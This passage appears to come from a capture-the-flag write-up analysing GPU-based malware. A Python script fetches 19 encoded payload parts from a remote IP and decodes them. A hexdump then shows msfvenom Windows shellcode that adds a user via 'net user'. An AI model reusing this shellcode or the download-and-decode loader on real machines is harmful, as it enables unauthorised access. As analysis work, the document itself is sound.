  3. Child2 -> reads the decoded payload -> executes it

We just need to retrieve each payload part and decode it, and we should get some valid executable code. Here is a Python 3 script that does those steps:

import requests
from pathlib import Path
from struct   import unpack_from, pack_into

URL   = "http://57.128.85.25:50002"
BASE_KEY   = 0xDEADBEEF

session = requests.Session()



def fetch(path: str) -> bytes:
    """GET ``URL/<path>`` through the shared session and return the raw body.

    Leading slashes in ``path`` are dropped so the URL never contains ``//``.
    ``raise_for_status()`` raises if the server answers with an error status.
    """
    response = session.get(f"{URL}/{path.lstrip('/')}", timeout=10)
    response.raise_for_status()
    return response.content


def decode_chunk(chunk, part) -> bytes:
    """Decode one downloaded part the same way the compute shader does.

    ``part`` is the 1-based index used in the URL, so the key is
    ``BASE_KEY - (part - 1) * 0x42`` (mod 2**32). Every little-endian 32-bit
    word is XORed with the key and 0x11001122 is added (mod 2**32).

    A chunk whose length is not a multiple of 4 is zero-padded for the last
    word and the result is cut back to ``len(chunk)`` bytes, mirroring the
    binary, which rounds the GPU buffer up to a multiple of 4 and returns only
    ``size`` bytes. The previous version raised ``struct.error`` in that case
    because it packed 4 bytes into a buffer that ended earlier.
    """
    key = (BASE_KEY - (part - 1) * 0x42) & 0xFFFFFFFF
    data = bytes(chunk)
    out = bytearray()
    for off in range(0, len(data), 4):
        # ljust pads a short trailing word with zero bytes before decoding.
        dword = int.from_bytes(data[off:off + 4].ljust(4, b"\0"), "little")
        plain32 = ((dword ^ key) + 0x11001122) & 0xFFFF_FFFF
        out += plain32.to_bytes(4, "little")
    # Drop the bytes that only exist because of the padding.
    return bytes(out[:len(data)])


def main():
    """Download parts 1 to 19, decode each one and write them to payload.bin."""
    pieces = []
    for part in range(1, 20):
        raw = fetch(str(part))
        pieces.append(decode_chunk(raw, part))

    # The file is only created once every part has been fetched and decoded.
    with open("payload.bin", "wb") as out:
        out.write(b"".join(pieces))


if __name__ == "__main__":
    main()

Flag

Once we run this script we get the final payload:

hexdump -C payload.bin
00000000  fc 48 83 e4 f0 e8 c0 00  00 00 41 51 41 50 52 51  |.H........AQAPRQ|
00000010  56 48 31 d2 65 48 8b 52  60 48 8b 52 18 48 8b 52  |VH1.eH.R`H.R.H.R|
00000020  20 48 8b 72 50 48 0f b7  4a 4a 4d 31 c9 48 31 c0  | H.rPH..JJM1.H1.|
00000030  ac 3c 61 7c 02 2c 20 41  c1 c9 0d 41 01 c1 e2 ed  |.<a|., A...A....|
00000040  52 41 51 48 8b 52 20 8b  42 3c 48 01 d0 8b 80 88  |RAQH.R .B<H.....|
00000050  00 00 00 48 85 c0 74 67  48 01 d0 50 8b 48 18 44  |...H..tgH..P.H.D|
00000060  8b 40 20 49 01 d0 e3 56  48 ff c9 41 8b 34 88 48  |.@ I...VH..A.4.H|
00000070  01 d6 4d 31 c9 48 31 c0  ac 41 c1 c9 0d 41 01 c1  |..M1.H1..A...A..|
00000080  38 e0 75 f1 4c 03 4c 24  08 45 39 d1 75 d8 58 44  |8.u.L.L$.E9.u.XD|
00000090  8b 40 24 49 01 d0 66 41  8b 0c 48 44 8b 40 1c 49  |.@$I..fA..HD.@.I|
000000a0  01 d0 41 8b 04 88 48 01  d0 41 58 41 58 5e 59 5a  |..A...H..AXAX^YZ|
000000b0  41 58 41 59 41 5a 48 83  ec 20 41 52 ff e0 58 41  |AXAYAZH.. AR..XA|
000000c0  59 5a 48 8b 12 e9 57 ff  ff ff 5d 48 ba 01 00 00  |YZH...W...]H....|
000000d0  00 00 00 00 00 48 8d 8d  01 01 00 00 41 ba 31 8b  |.....H......A.1.|
000000e0  6f 87 ff d5 bb f0 b5 a2  56 41 ba a6 95 bd 9d ff  |o.......VA......|
000000f0  d5 48 83 c4 28 3c 06 7c  0a 80 fb e0 75 05 bb 47  |.H..(<.|....u..G|
00000100  13 72 6f 6a 00 59 41 89  da ff d5 6e 65 74 20 75  |.roj.YA....net u|
00000110  73 65 72 20 47 50 55 5f  6d 34 6c 77 61 72 65 73  |ser GPU_m4lwares|
00000120  5f 41 52 45 5f 66 75 6e  20 74 44 74 4e 52 59 4a  |_ARE_fun tDtNRYJ|

We can see a plaintext string at the end: net user GPU_m4lwares_ARE_fun tDtNRYJ, which is a Windows command to add a user (the payload is an msfvenom shellcode that adds a user on the PC).